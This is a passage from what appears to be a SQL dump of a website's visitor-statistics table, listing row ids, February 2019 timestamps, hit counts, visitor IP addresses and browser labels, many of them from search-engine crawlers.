,1,0,0,'8.29.198.26','other'),(380388,1549011071,1,1,0,0,'54.36.148.240','other'),(380389,1549011320,1,1,0,0,'54.36.149.77','other'),(380390,1549011394,3,3,0,0,'66.249.65.198','chrome'),(380391,1549011468,2,2,0,0,'66.249.65.196','chrome'),(380392,1549011889,1,1,0,0,'216.244.66.241','other'),(380393,1549011997,2,2,0,0,'91.209.11.236','other'),(380394,1549012517,2,2,0,0,'66.249.65.194','chrome'),(380395,1549012794,1,1,0,0,'8.29.198.27','other'),(380396,1549012835,1,1,0,0,'66.249.65.196','chrome'),(380397,1549012968,1,1,0,0,'5.45.207.79','other'),(380398,1549013058,1,1,0,0,'54.36.148.45','other'),(380399,1549013059,1,1,0,0,'94.178.141.125','chrome'),(380400,1549013172,1,1,0,0,'66.249.73.31','chrome'),(380401,1549013256,1,1,0,0,'54.36.148.145','other'),(380402,1549013375,1,1,0,0,'54.36.148.253','other'),(380403,1549013528,1,1,0,0,'66.249.65.194','chrome'),(380404,1549013532,2,2,0,0,'66.249.65.198','chrome'),(380405,1549013872,1,1,0,0,'54.36.149.75','other'),(380406,1549013910,1,1,0,0,'54.36.148.200','other'),(380407,1549014013,1,1,0,0,'207.46.13.78','other'),(380408,1549014381,1,1,0,0,'46.229.168.141','other'),(380409,1549014458,1,1,0,0,'54.36.148.73','other'),(380410,1549014514,1,1,0,0,'54.36.148.195','other'),(380411,1549014721,1,1,0,0,'54.36.149.55','other'),(380412,1549015140,1,1,0,0,'54.36.148.90','other'),(380413,1549015302,1,1,0,0,'54.36.149.16','other'),(380414,1549015542,1,1,0,0,'37.54.165.34','chrome'),(380415,1549015579,1,1,0,0,'54.36.149.17','other'),(380416,1549016164,2,2,0,0,'66.249.65.194','chrome'),(380417,1549016174,2,2,0,0,'54.36.148.74','other'),(380418,1549016288,7,7,0,0,'157.55.39.154','other'),(380419,1549016334,1,1,0,0,'216.244.66.241','other'),(380420,1549016419,1,1,0,0,'54.36.148.209','other'),(380421,1549016535,1,1,0,0,'54.36.148.235','other'),(380422,1549016981,1,1,0,0,'66.249.65.198','chrome'),(380423,1549017033,1,1,0,0,'54.36.148.212','other'),(380424,1549017090,1,1,0,0,'54.36.148.12','other'),(380425,1549017117,1,1,0,0,'66.249.65.194','chrome'),(380426,1549017134,1,1,0,0,'54.36.149.12','other'),(380427,1549017242,1,1,0,0,'54.36.149.56','other'),(380428,1549017286,2,2,0,0,'157.55.39.253','other'),(380429,1549017527,1,1,0,0,'54.36.148.109','other'),(380430,1549017985,1,1,0,0,'54.36.148.212','other'),(380431,1549018013,1,1,0,0,'66.249.65.196','chrome'),(380432,1549018251,1,1,0,0,'66.249.65.194','chrome'),(380433,1549018488,1,1,0,0,'54.36.148.205','other'),(380434,1549018499,1,1,0,0,'54.36.148.84','other'),(380435,1549018631,1,1,0,0,'66.249.65.198','chrome'),(380436,1549018683,1,1,0,0,'5.45.207.19','other'),(380437,1549018720,1,1,0,0,'54.36.148.219','other'),(380438,1549019277,1,1,0,0,'46.229.168.146','other'),(380439,1549019460,1,1,0,0,'66.249.65.196','chrome'),(380440,1549019558,1,1,0,0,'46.201.63.189','chrome'),(380441,1549020371,1,1,0,0,'54.36.149.52','other'),(380442,1549020418,1,1,0,0,'66.249.65.196','chrome'),(380443,1549020448,1,1,0,0,'180.76.15.34','other'),(380444,1549020487,1,1,0,0,'54.36.148.29','other'),(380445,1549020497,1,1,0,0,'54.36.149.15','other'),(380446,1549020798,1,1,0,0,'66.249.73.31','chrome'),(380447,1549020853,1,1,0,0,'54.36.149.74','other'),(380448,1549020908,1,1,0,0,'46.211.120.249','chrome'),(380449,1549021490,1,1,0,0,'66.249.65.196','chrome'),(380450,1549021604,1,1,0,0,'8.29.198.25','other'),(380451,1549021862,2,2,0,0,'216.244.66.241','other'),(380452,1549021885,1,1,0,0,'77.222.159.114','chrome'),(380453,1549021949,2,2,0,0,'66.249.65.198','chrome'),(380454,1549022279,1,1,0,0,'207.46.13.35','other'),(380455,1549022603,2,2,0,0,'54.36.148.129','other'),(380456,1549022733,1,1,0,0,'91.196.178.136','firefox'),(380457,1549022907,1,1,0,0,'54.36.148.57','other'),(380458,1549023043,1,1,0,0,'54.36.149.90','other'),(380459,1549023194,1,1,0,0,'37.55.134.33','chrome'),(380460,1549023299,1,1,0,0,'46.229.168.147','other'),(380461,1549023416,1,1,0,0,'54.36.149.52','other'),(380462,1549023650,1,1,0,0,'8.29.198.25','other'),(380463,1549023678,1,1,0,0,'54.36.148.228','other'),(380464,1549023728,2,2,0,0,'66.249.65.198','chrome'),(380465,1549023770,1,1,0,0,'54.36.148.180','other'),(380466,1549023876,2,2,0,0,'207.46.13.29','other'),(380467,1549024083,1,1,0,0,'46.229.168.138','other'),(380468,1549024084,2,2,0,0,'66.249.65.196','chrome'),(380469,1549024150,2,2,0,0,'216.244.66.241','other'),(380470,1549024423,3,3,0,0,'66.249.65.194','chrome'),(380471,1549024746,1,1,0,0,'91.196.178.136','firefox'),(380472,1549024817,1,1,0,0,'207.46.13.0','other'),(380473,1549024840,1,1,0,0,'91.196.178.172','chrome'),(380474,1549024909,1,1,0,0,'66.249.73.30','chrome'),(380475,1549025013,2,2,0,0,'91.209.11.236','other'),(380476,1549025134,1,1,0,0,'46.229.168.129','other'),(380477,1549025176,1,1,0,0,'46.229.168.154','other'),(380478,1549025261,1,1,0,0,'40.77.167.15','other'),(380479,1549025320,1,1,0,0,'54.36.148.136','other'),(380480,1549025500,1,1,0,0,'66.249.65.196','chrome'),(380481,1549025596,1,1,0,0,'54.36.148.92','other'),(380482,1549025598,1,1,0,0,'66.249.65.194','chrome'),(380483,1549025610,1,1,0,0,'54.36.149.35','other'),(380484,1549025686,1,1,0,0,'35.187.132.29','chrome'),(380485,1549025955,1,1,0,0,'54.36.148.27','other'),(380486,1549026056,1,1,0,0,'54.36.149.40','other'),(380487,1549026217,1,1,0,0,'13.57.233.99','chrome'),(380488,1549026261,1,1,0,0,'178.92.224.151','chrome'),(380489,1549026789,1,1,0,0,'54.36.149.26','other'),(380490,1549027013,1,1,0,0,'54.36.148.144','other'),(380491,1549027680,2,2,0,0,'216.244.66.241','other'),(380492,1549027764,1,1,0,0,'91.196.178.176','chrome'),(380494,1549027797,1,1,0,0,'54.36.148.235','other'),(380495,1549028114,1,1,0,0,'207.46.13.0','other'),(380496,1549028430,1,1,0,0,'54.36.148.24','other'),(380497,1549028451,1,1,0,0,'209.17.97.2','other'),(380498,1549028629,1,1,0,0,'66.249.65.198','chrome'),(380499,1549028667,6,6,0,0,'66.249.65.194','chrome'),(380500,1549028748,1,1,0,0,'54.36.148.27','other'),(380501,1549028750,1,1,0,0,'54.36.149.79','other'),(380502,1549028755,1,1,0,0,'66.249.65.196','chrome'),(380503,1549028760,1,1,0,0,'46.229.168.145','other'),(380504,1549028870,1,1,0,0,'46.229.168.129','other'),(380505,1549028962,1,1,0,0,'54.36.148.123','other'),(380506,1549029270,1,1,0,0,'5.45.207.19','other'),(380507,1549029275,1,1,0,0,'54.36.148.200','other'),(380508,1549029694,2,2,0,0,'91.196.178.69','chrome'),(380509,1549029738,1,1,0,0,'91.196.178.87','chrome'),(380510,1549029861,1,1,0,0,'54.36.149.29','other'),(380511,1549029884,1,1,0,0,'54.36.148.93','other'),(380512,1549029994,1,1,0,0,'216.244.66.241','other'),(380513,1549030114,1,1,0,0,'54.36.148.144','other'),(380514,1549030288,1,1,0,0,'66.249.65.198','chrome'),(380515,1549030408,1,0,1,0,'66.249.65.196',''),(380516,1549030593,1,1,0,0,'54.36.149.16','other'),(380517,1549030824,1,1,0,0,'54.36.149.40','other'),(380518,1549031168,1,1,0,0,'54.36.148.221','other'),(380519,1549031209,1,1,0,0,'130.180.217.230','chrome'),(380520,1549031286,1,1,0,0,'46.229.168.148','other'),(380521,1549031408,1,1,0,0,'66.249.73.31','chrome'),(380522,1549031539,1,1,0,0,'54.36.149.13','other'),(380523,1549031708,1,1,0,0,'40.77.169.26','other'),(380524,1549031851,1,1,0,0,'54.36.149.53','other'),(380525,1549031951,1,1,0,0,'54.36.148.171','other'),(380526,1549031999,1,1,0,0,'54.36.149.75','other'),(380527,1549032447,1,1,0,0,'8.29.198.27','other'),(380528,1549032498,1,1,0,0,'54.36.148.78','other'),(380529,1549032957,1,1,0,0,'216.244.66.241','other'),(380530,1549033279,1,1,0,0,'54.36.148.147','other'),(380531,1549033302,1,1,0,0,'54.36.149.71','other'),(380532,1549033948,1,1,0,0,'46.229.168.147','other'),(380533,1549034123,1,1,0,0,'54.36.149.75','other'),(380534,1549034263,1,1,0,0,'195.10.210.70','chrome'),(380535,1549034500,1,1,0,0,'8.29.198.27','other'),(380536,1549034657,1,1,0,0,'178.63.68.137','firefox'),(380537,1549034825,1,1,0,0,'66.249.73.1','chrome'),(380538,1549035115,1,1,0,0,'54.36.149.93','other'),(380539,1549035200,1,1,0,0,'54.36.148.218','other'),(380540,1549035416,1,1,0,0,'207.46.13.133','other'),(380541,1549035492,2,2,0,0,'207.46.13.157','other'),(380542,1549035798,1,1,0,0,'54.36.149.21','other'),(380543,1549036010,1,1,0,0,'54.36.148.123','other'),(380544,1549036053,1,1,0,0,'46.211.26.89','chrome'),(380545,1549036230,1,1,0,0,'54.36.148.73','other'),(380546,1549036400,1,1,0,0,'54.36.148.31','other'),(380547,1549036416,1,1,0,0,'54.36.149.68','other'),(380548,1549036461,1,1,0,0,'54.36.148.164','other'),(380549,1549036710,1,1,0,0,'54.36.149.43','other'),(380550,1549036910,1,1,0,0,'54.36.148.242','other'),(380551,1549037370,1,1,0,0,'46.229.168.144','other'),(380552,1549037443,1,1,0,0,'66.249.73.30','chrome'),(380553,1549037527,1,1,0,0,'54.36.149.29','other'),(380554,1549037528,1,1,0,0,'91.196.178.72','firefox'),(380555,1549037743,1,1,0,0,'66.249.65.194','chrome'),(380556,1549038006,2,2,0,0,'216.244.66.241','other'),(380557,1549038023,1,1,0,0,'66.249.65.198','chrome'),(380558,1549038060,1,1,0,0,'46.211.135.40','chrome'),(380559,1549038064,2,2,0,0,'66.249.65.196','chrome'),(380560,1549038088,1,1,0,0,'54.36.148.11','other'),(380561,1549038090,1,1,0,0,'46.229.168.148','other'),(380562,1549038107,2,2,0,0,'66.249.73.1','chrome'),(380563,1549038131,1,1,0,0,'91.209.11.236','other'),(380564,1549038142,1,1,0,0,'54.36.148.56','other'),(380565,1549038333,1,1,0,0,'91.196.178.47','chrome'),(380566,1549038656,1,1,0,0,'46.211.27.170','chrome'),(380567,1549038719,1,1,0,0,'207.46.13.0','other'),(380568,1549038754,1,1,0,0,'54.36.148.222','other'),(380569,1549038975,4,4,0,0,'216.244.66.241','other'),(380570,1549039316,1,1,0,0,'66.249.65.196','chrome'),(380571,1549039590,1,1,0,0,'66.249.73.30','chrome'),(380572,1549039686,1,1,0,0,'54.36.148.126','other'),(380573,1549039784,1,1,0,0,'171.67.70.44','other'),(380574,1549039889,1,1,0,0,'46.229.168.145','other'),(380575,1549039930,1,1,0,0,'54.36.149.73','other'),(380576,1549039993,1,1,0,0,'54.36.148.137','other'),(380577,1549040291,1,1,0,0,'54.36.149.35','other'),(380578,1549040307,2,2,0,0,'91.209.11.236','other'),(380580,1549040383,1,1,0,0,'95.134.169.181','chrome'),(380581,1549040643,1,1,0,0,'54.36.148.26','other'),(380582,1549041196,1,1,0,0,'54.36.148.185','other'),(380583,1549041319,2,2,0,0,'66.249.65.198','chrome'),(380584,1549041341,1,1,0,0,'54.36.148.99','other'),(380585,1549041368,1,1,0,0,'54.36.149.106','other'),(380586,1549042306,1,1,0,0,'54.36.149.101','other'),(380587,1549042591,1,1,0,0,'54.36.148.231','other'),(380588,1549042711,1,1,0,0,'54.36.149.64','other'),(380589,1549042808,1,1,0,0,'54.36.149.90','other'),(380590,1549042831,1,1,0,0,'54.36.149.32','other'),(380591,1549043166,1,1,0,0,'54.36.148.98','other'),(380592,1549043219,1,1,0,0,'46.229.168.146','other'),(380593,1549043294,1,1,0,0,'54.36.148.158','other'),(380594,1549043295,1,1,0,0,'8.29.198.27','other'),(380595,1549043421,2,2,0,0,'216.244.66.241','other'),(380596,1549043525,1,1,0,0,'66.249.65.194','chrome'),(380597,1549043551,1,1,0,0,'66.249.73.1','chrome'),(380598,1549043576,1,1,0,0,'54.36.148.109','other'),(380599,1549043664,1,1,0,0,'66.249.65.198','chrome'),(380600,1549043711,1,1,0,0,'46.229.168.133','other'),(380601,1549044046,1,1,0,0,'46.229.168.153','other'),(380602,1549044233,1,1,0,0,'54.36.148.136','other'),(380603,1549044751,1,1,0,0,'54.36.149.41','other'),(380604,1549044904,1,1,0,0,'77.111.247.51','chrome'),(380605,1549045283,1,1,0,0,'54.36.148.253','other'),(380606,1549045335,1,1,0,0,'8.29.198.26','other'),(380607,1549045943,1,1,0,0,'54.36.148.198','other'),(380608,1549046028,2,2,0,0,'66.249.73.31','chrome'),(380609,1549046070,1,1,0,0,'54.36.149.21','other'),(380610,1549046268,2,2,0,0,'66.249.65.198','chrome'),(380611,1549046279,1,1,0,0,'54.36.148.37','other'),(380612,1549046465,1,1,0,0,'54.36.148.13','other'),(380613,1549046482,1,1,0,0,'54.36.148.93','other'),(380614,1549046525,1,1,0,0,'54.36.149.1','other'),(380615,1549046620,1,1,0,0,'54.36.148.207','other'),(380616,1549046644,1,1,0,0,'54.36.149.71','other'),(380617,1549046847,1,1,0,0,'207.46.13.86','other'),(380618,1549046913,1,1,0,0,'54.36.148.159','other'),(380619,1549047228,1,1,0,0,'141.8.142.103','other'),(380620,1549047312,1,1,0,0,'54.36.148.84','other'),(380621,1549047362,3,3,0,0,'66.249.65.194','chrome'),(380622,1549047438,1,1,0,0,'51.255.65.46','other'),(380623,1549047531,1,1,0,0,'54.36.149.104','other'),(380624,1549047798,1,1,0,0,'91.196.178.168','chrome'),(380625,1549047812,1,1,0,0,'180.76.15.134','other'),(380626,1549048120,1,1,0,0,'66.249.73.1','chrome'),(380627,1549048570,2,2,0,0,'66.249.65.198','chrome'),(380628,1549048634,1,1,0,0,'66.249.65.196','chrome'),(380629,1549048829,1,1,0,0,'54.36.148.86','other'),(380630,1549049139,1,1,0,0,'216.244.66.241','other'),(380631,1549049320,1,1,0,0,'54.36.148.45','other'),(380632,1549049926,2,2,0,0,'66.249.65.194','chrome'),(380633,1549050354,1,1,0,0,'54.36.148.138','other'),(380634,1549050410,1,1,0,0,'54.36.148.196','other'),(380635,1549050463,1,1,0,0,'66.249.65.196','chrome'),(380636,1549050544,1,1,0,0,'66.249.65.198','chrome'),(380637,1549050821,1,1,0,0,'66.249.73.30','chrome'),(380638,1549050874,1,1,0,0,'66.249.65.194','chrome'),(380639,1549050978,1,1,0,0,'40.77.167.103','other'),(380640,1549051065,1,1,0,0,'54.36.148.188','other'),(380641,1549051588,1,1,0,0,'66.249.65.198','chrome'),(380642,1549051599,1,1,0,0,'54.36.149.12','other'),(380643,1549051811,1,1,0,0,'180.76.15.137','other'),(380644,1549051877,2,2,0,0,'66.249.65.196','chrome'),(380645,1549052247,1,1,0,0,'66.249.65.194','chrome'),(380646,1549052367,1,1,0,0,'66.249.73.30','chrome'),(380647,1549052630,1,1,0,0,'66.249.65.198','chrome'),(380648,1549052823,1,1,0,0,'54.36.148.153','other'),(380649,1549052869,1,1,0,0,'54.36.148.66','other'),(380650,1549052878,1,1,0,0,'54.36.148.194','other'),(380651,1549053233,1,1,0,0,'54.36.148.11','other'),(380652,1549053417,1,1,0,0,'46.229.168.148','other'),(380653,1549053477,2,2,0,0,'207.46.13.86','other'),(380654,1549053666,1,1,0,0,'66.249.73.30','chrome'),(380655,1549053739,2,2,0,0,'207.46.13.5','other'),(380656,1549054141,1,1,0,0,'8.29.198.25','other'),(380657,1549054426,1,1,0,0,'54.36.149.39','other'),(380658,1549054594,1,1,0,0,'54.36.148.204','other'),(380659,1549054943,1,1,0,0,'40.77.169.26','other'),(380660,1549055319,1,1,0,0,'54.36.148.122','other'),(380661,1549055416,1,1,0,0,'91.196.178.186','chrome'),(380662,1549055609,1,1,0,0,'54.36.148.101','other'),(380663,1549055702,1,1,0,0,'54.36.149.95','other'),(380664,1549056068,2,2,0,0,'66.249.65.196','chrome'),(380665,1549056187,1,1,0,0,'8.29.198.26','other'),(380666,1549056276,1,1,0,0,'66.249.73.1','chrome'),(380667,1549056766,1,1,0,0,'66.249.65.194','chrome'),(380668,1549056895,1,1,0,0,'66.249.73.30','chrome'),(380669,1549056907,1,1,0,0,'66.249.73.31','chrome'),(380670,1549056958,1,1,0,0,'54.36.148.236','other'),(380671,1549057247,2,2,0,0,'216.244.66.241','other'),(380672,1549057290,1,1,0,0,'54.36.148.24','other'),(380673,1549057333,1,1,0,0,'69.30.198.242','other'),(380674,1549057356,1,1,0,0,'66.249.65.196','chrome'),(380675,1549057409,12,12,0,0,'144.76.96.236','other'),(380676,1549057776,1,1,0,0,'207.46.13.86','other'),(380677,1549057953,2,2,0,0,'66.249.65.194','chrome'),(380678,1549058013,1,1,0,0,'207.46.13.253','other'),(380679,1549058142,1,1,0,0,'54.36.148.27','other'),(380680,1549058737,1,1,0,0,'54.36.149.74','other'),(380681,1549058851,1,1,0,0,'54.36.148.102','other'),(380682,1549058865,1,1,0,0,'66.249.65.196','chrome'),(380683,1549058950,1,1,0,0,'66.249.65.194','chrome'),(380684,1549058962,1,1,0,0,'54.36.148.147','other'),(380685,1549059204,1,1,0,0,'54.36.148.108','other'),(380686,1549059656,1,1,0,0,'54.36.148.236','other'),(380687,1549059760,532,532,0,0,'80.248.225.142','other'),(380688,1549060661,213,213,0,0,'80.248.225.142','other'),(380689,1549060677,1,1,0,0,'54.36.149.57','other'),(380690,1549060693,1,1,0,0,'216.244.66.241','other'),(380691,1549060714,1,1,0,0,'54.36.148.216','other'),(380692,1549061007,1,1,0,0,'46.229.168.133','other'),(380693,1549061506,1,1,0,0,'54.36.148.98','other'),(380694,1549061903,2,2,0,0,'207.46.13.5','other'),(380695,1549062096,1,1,0,0,'216.244.66.241','other'),(380696,1549062531,1,1,0,0,'54.36.148.156','other'),(380697,1549063097,1,1,0,0,'54.36.148.187','other'),(380698,1549063236,1,1,0,0,'216.244.66.241','other'),(380699,1549063971,1,1,0,0,'54.36.148.196','other'),(380700,1549064114,1,1,0,0,'54.36.148.195','other'),(380701,1549064200,1,1,0,0,'54.36.149.32','other'),(380702,1549064350,1,1,0,0,'54.36.149.67','other'),(380703,1549064438,1,1,0,0,'178.154.244.11','other'),(380704,1549064534,5,5,0,0,'66.249.65.196','chrome'),(380705,1549064623,1,1,0,0,'46.229.168.143','other'),(380706,1549064851,5,5,0,0,'66.249.65.194','chrome'),(380707,1549064997,1,1,0,0,'8.29.198.27','other'),(380708,1549065011,2,2,0,0,'66.249.65.198','chrome'),(380709,1549065013,1,1,0,0,'216.244.66.241','other'),(380710,1549065333,1,1,0,0,'54.36.149.70','other'),(380711,1549065483,1,1,0,0,'46.229.168.134','other'),(380712,1549065515,1,1,0,0,'66.249.65.196','chrome'),(380713,1549065935,1,1,0,0,'54.36.148.210','other'),(380714,1549066157,1,1,0,0,'54.36.148.236','other'),(380715,1549066308,1,1,0,0,'66.249.65.198','chrome'),(380716,1549066391,1,1,0,0,'54.36.148.100','other'),(380717,1549066404,1,1,0,0,'54.36.148.228','other'),(380718,1549066549,1,1,0,0,'66.249.65.194','chrome'),(380719,1549066674,1,1,0,0,'54.36.149.98','other'),(380720,1549067039,1,1,0,0,'8.29.198.25','other'),(380721,1549067540,1,1,0,0,'54.36.148.145','other'),(380722,1549068061,1,1,0,0,'54.36.148.96','other'),(380723,1549068192,1,1,0,0,'54.36.148.248','other'),(380724,1549068208,1,1,0,0,'54.36.148.35','other'),(380725,1549068237,1,1,0,0,'54.36.149.65','other'),(380726,1549068379,1,1,0,0,'54.36.148.201','other'),(380727,1549068622,1,1,0,0,'54.36.148.26','other'),(380728,1549068792,1,1,0,0,'54.36.148.160','other'),(380729,1549068852,1,1,0,0,'46.229.168.141','other'),(380730,1549068876,1,1,0,0,'207.46.13.51','other'),(380731,1549068909,1,1,0,0,'185.220.102.7','other'),(380732,1549069193,1,1,0,0,'54.36.148.92','other'),(380733,1549069383,1,1,0,0,'54.36.148.47','other'),(380734,1549069767,1,1,0,0,'216.244.66.241','other'),(380735,1549069843,1,1,0,0,'54.36.149.74','other'),(380736,1549070101,1,1,0,0,'54.36.149.79','other'),(380737,1549070103,1,1,0,0,'54.36.149.26','other'),(380738,1549070216,3,3,0,0,'66.249.65.196','chrome'),(380739,1549070476,1,1,0,0,'54.36.148.16','other'),(380740,1549070669,2,2,0,0,'216.244.66.241','other'),(380741,1549070841,1,1,0,0,'54.36.148.59','other'),(380742,1549071625,1,1,0,0,'13.66.139.0','other'),(380743,1549071701,1,1,0,0,'54.36.149.72','other'),(380744,1549073635,1,1,0,0,'54.36.148.27','other'),(380745,1549074027,1,1,0,0,'46.229.168.148','other'),(380746,1549074336,1,1,0,0,'66.249.65.196','chrome'),(380747,1549075158,1,1,0,0,'54.36.148.14','other'),(380748,1549075329,1,1,0,0,'54.36.149.40','other'),(380749,1549075464,1,1,0,0,'54.36.149.71','other'),(380750,1549075617,1,1,0,0,'46.229.168.151','other'),(380751,1549075762,1,1,0,0,'54.36.149.51','other'),(380752,1549075830,1,1,0,0,'8.29.198.26','other'),(380753,1549075947,1,1,0,0,'178.154.244.11','other'),(380754,1549076032,1,1,0,0,'54.36.148.223','other'),(380755,1549076117,1,1,0,0,'207.46.13.5','other'),(380756,1549076150,1,1,0,0,'66.249.65.198','chrome'),(380757,1549076375,1,1,0,0,'216.244.66.241','other'),(380758,1549076430,2,2,0,0,'34.221.30.69','chrome'),(380759,1549076702,1,1,0,0,'54.36.148.199','other'),(380760,1549076806,1,1,0,0,'54.36.149.93','other'),(380761,1549077074,1,1,0,0,'54.36.149.45','other'),(380762,1549077232,1,1,0,0,'54.36.148.68','other'),(380763,1549077721,1,1,0,0,'66.249.65.194','chrome'),(380764,1549077883,1,1,0,0,'8.29.198.27','other'),(380765,1549077919,1,1,0,0,'66.249.65.198','chrome'),(380766,1549078017,1,1,0,0,'54.36.148.31','other'),(380767,1549078077,1,1,0,0,'66.249.65.196','chrome'),(380768,1549078492,1,1,0,0,'54.36.148.80','other'),(380769,1549078508,1,1,0,0,'54.36.149.8','other'),(380770,1549078655,1,1,0,0,'207.46.13.5','other'),(380771,1549078949,1,1,0,0,'46.229.168.144','other'),(380772,1549079485,1,1,0,0,'54.36.149.13','other'),(380773,1549079575,1,1,0,0,'54.36.148.60','other'),(380774,1549079720,1,1,0,0,'46.229.168.140','other'),(380775,1549079964,1,1,0,0,'54.36.148.181','other'),(380776,1549080102,1,1,0,0,'171.67.70.46','other'),(380777,1549080503,1,1,0,0,'54.36.148.90','other'),(380778,1549080686,1,1,0,0,'54.36.148.136','other'),(380779,1549081050,1,1,0,0,'54.36.148.94','other'),(380780,1549081493,1,1,0,0,'46.229.168.135','other'),(380781,1549081720,1,1,0,0,'54.36.149.94','other'),(380782,1549082299,1,1,0,0,'54.36.148.53','other'),(380783,1549082458,3,3,0,0,'66.249.65.194','chrome'),(380784,1549082755,1,1,0,0,'46.229.168.143','other'),(380785,1549082896,1,1,0,0,'54.36.149.67','other'),(380786,1549083174,3,3,0,0,'66.249.65.196','chrome'),(380787,1549083218,1,1,0,0,'66.249.65.198','chrome'),(380788,1549083223,1,1,0,0,'54.36.148.238','other'),(380789,1549083367,1,1,0,0,'54.36.148.254','other'),(380790,1549083493,2,2,0,0,'95.213.141.126','opera'),(380791,1549084772,1,1,0,0,'54.36.148.56','other'),(380792,1549085315,1,1,0,0,'54.36.148.228','other'),(380793,1549085693,1,1,0,0,'46.229.168.140','other'),(380794,1549085899,1,1,0,0,'207.46.13.10','other'),(380795,1549086089,6,6,0,0,'66.249.65.194','chrome'),(380796,1549086203,1,1,0,0,'54.36.149.72','other'),(380797,1549086674,4,4,0,0,'66.249.65.196','chrome'),(380798,1549086677,1,1,0,0,'8.29.198.25','other'),(380799,1549086691,1,1,0,0,'178.63.68.137','firefox'),(380800,1549086912,1,1,0,0,'46.229.168.130','other'),(380801,1549087009,5,5,0,0,'66.249.65.194','chrome'),(380802,1549087089,1,1,0,0,'54.36.149.85','other'),(380803,1549087145,1,1,0,0,'66.249.65.198','chrome'),(380804,1549087147,1,1,0,0,'54.36.149.94','other'),(380805,1549087179,1,1,0,0,'54.36.148.124','other'),(380806,1549087396,1,1,0,0,'54.36.148.146','other'),(380807,1549087606,1,1,0,0,'54.36.148.219','other'),(380808,1549087757,1,1,0,0,'54.36.148.133','other'),(380809,1549087904,1,1,0,0,'185.220.101.49','other'),(380810,1549087934,1,1,0,0,'66.249.65.194','chrome'),(380811,1549088730,1,1,0,0,'54.36.148.150','other'),(380812,1549088739,1,1,0,0,'8.29.198.26','other'),(380813,1549089154,1,1,0,0,'54.36.148.131','other'),(380814,1549089216,1,1,0,0,'157.55.39.241','other'),(380815,1549089388,1,1,0,0,'66.249.65.194','chrome'),(380816,1549089476,1,1,0,0,'66.249.65.196','chrome'),(380817,1549089530,1,1,0,0,'52.53.201.78','chrome'),(380818,1549089602,1,1,0,0,'46.229.168.145','other'),(380819,1549089926,1,1,0,0,'66.249.73.30','chrome'),(380820,1549089949,1,1,0,0,'216.244.66.241','other'),(380821,1549090040,1,1,0,0,'207.46.13.5','other'),(380822,1549090287,1,1,0,0,'66.249.73.1','chrome'),(380823,1549090360,1,1,0,0,'54.36.148.170','other'),(380824,1549090472,1,1,0,0,'54.36.148.58','other'),(380825,1549090533,1,1,0,0,'54.36.149.68','other'),(380826,1549090546,3,3,0,0,'66.249.65.196','chrome'),(380827,1549090717,1,1,0,0,'46.229.168.141','other'),(380828,1549091541,1,1,0,0,'216.244.66.241','other'),(380829,1549091688,1,1,0,0,'66.249.73.30','chrome'),(380830,1549091700,3,3,0,0,'66.249.65.198','chrome'),(380831,1549091780,6,6,0,0,'66.249.65.194','chrome'),(380832,1549091819,1,1,0,0,'54.36.148.135','other'),(380833,1549091826,2,2,0,0,'207.46.13.51','other'),(380834,1549091836,2,2,0,0,'66.249.65.196','chrome'),(380835,1549091931,1,1,0,0,'46.229.168.152','other'),(380836,1549091954,1,1,0,0,'54.36.148.170','other'),(380837,1549091981,2,2,0,0,'66.249.73.31','chrome'),(380838,1549092067,1,1,0,0,'54.36.148.222','other'),(380839,1549092356,1,1,0,0,'54.36.149.5','other'),(380840,1549092526,1,1,0,0,'66.249.73.1','chrome'),(380841,1549092758,1,1,0,0,'46.229.168.132','other'),(380842,1549092790,1,1,0,0,'54.36.148.46','other'),(380843,1549093312,1,1,0,0,'54.36.148.174','other'),(380844,1549093426,1,1,0,0,'54.36.149.32','other'),(380845,1549093819,1,1,0,0,'54.36.149.87','other'),(380846,1549093971,1,1,0,0,'54.36.149.8','other'),(380847,1549094065,2,2,0,0,'66.249.65.194','chrome'),(380848,1549094080,1,1,0,0,'66.249.73.30','chrome'),(380849,1549094600,1,1,0,0,'157.55.39.243','other'),(380850,1549094757,1,1,0,0,'157.55.39.241','other'),(380851,1549095456,2,2,0,0,'216.244.66.241','other'),(380852,1549095557,1,1,0,0,'66.249.65.194','chrome'),(380853,1549095661,1,1,0,0,'54.36.148.235','other'),(380854,1549095941,1,1,0,0,'54.36.149.64','other'),(380855,1549095988,1,1,0,0,'157.55.39.241','other'),(380856,1549096027,1,1,0,0,'188.32.254.55','msie'),(380857,1549096041,1,1,0,0,'128.68.32.130','msie'),(380858,1549096581,1,1,0,0,'54.36.148.166','other'),(380859,1549096767,1,1,0,0,'54.36.148.59','other'),(380860,1549096785,1,1,0,0,'46.229.168.150','other'),(380861,1549097226,1,1,0,0,'46.229.168.134','other'),(380862,1549097530,1,1,0,0,'8.29.198.26','other'),(380863,1549097715,1,1,0,0,'66.249.65.198','chrome'),(380864,1549097835,3,3,0,0,'66.249.65.194','chrome'),(380865,1549098181,1,1,0,0,'216.244.66.241','other'),(380866,1549098250,3,3,0,0,'66.249.65.196','chrome'),(380867,1549098347,1,1,0,0,'110.22.129.94','firefox'),(380868,1549098464,1,1,0,0,'54.36.149.69','other'),(380869,1549098906,2,2,0,0,'66.249.65.194','chrome'),(380870,1549099405,1,1,0,0,'54.36.148.23','other'),(380871,1549099591,1,1,0,0,'8.29.198.25','other'),(380872,1549099920,1,1,0,0,'54.36.148.140','other'),(380873,1549100070,2,2,0,0,'216.244.66.241','other'),(380874,1549100094,2,2,0,0,'5.45.207.19','other'),(380875,1549100244,1,1,0,0,'157.55.39.61','other'),(380876,1549100318,1,1,0,0,'54.36.148.231','other'),(380877,1549100332,1,1,0,0,'207.46.13.5','other'),(380878,1549100556,3,3,0,0,'66.249.65.196','chrome'),(380879,1549100572,3,3,0,0,'66.249.65.194','chrome'),(380880,1549100729,1,1,0,0,'46.229.168.132','other'),(380881,1549100856,1,1,0,0,'157.55.39.241','other'),(380882,1549101072,1,1,0,0,'91.196.178.81','chrome'),(380883,1549101355,1,1,0,0,'54.36.149.31','other'),(380884,1549101702,1,1,0,0,'213.108.41.211','chrome'),(380885,1549101817,1,1,0,0,'54.36.148.157','other'),(380886,1549102051,1,1,0,0,'157.55.39.241','other'),(380887,1549102063,1,1,0,0,'66.249.65.196','chrome'),(380888,1549102202,1,1,0,0,'54.36.148.171','other'),(380889,1549102235,1,1,0,0,'54.36.148.215','other'),(380890,1549102414,1,1,0,0,'66.249.65.198','chrome'),(380891,1549102611,1,1,0,0,'46.229.168.134','other'),(380892,1549102879,1,1,0,0,'91.234.199.12','chrome'),(380893,1549102965,2,2,0,0,'66.249.65.196','chrome'),(380894,1549103155,1,1,0,0,'54.36.148.40','other'),(380895,1549103324,1,1,0,0,'46.229.168.133','other'),(380896,1549103471,1,1,0,0,